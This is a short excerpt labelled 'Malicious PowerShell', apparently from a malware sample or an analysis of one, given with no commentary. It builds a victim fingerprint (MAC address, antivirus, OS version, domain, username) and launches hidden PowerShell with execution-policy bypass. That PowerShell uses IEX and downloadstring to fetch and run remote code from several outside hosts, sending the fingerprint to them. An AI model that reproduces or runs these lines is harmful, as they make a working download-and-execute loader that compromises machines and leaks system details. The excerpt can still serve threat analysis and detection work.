Malicious PowerShell (Excerpt)

1. $key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
2.  
3. #Sample Key:
4. #mac=00-0C-29-AA-AB-32&av=Windows Defender&version=10.0.14393&bit=64-bit&flag2=False&domain=WORKGROUP&user=user&PS=True
5.  
6. $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
7. $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
8. $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
9. $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
10. $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
11. $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'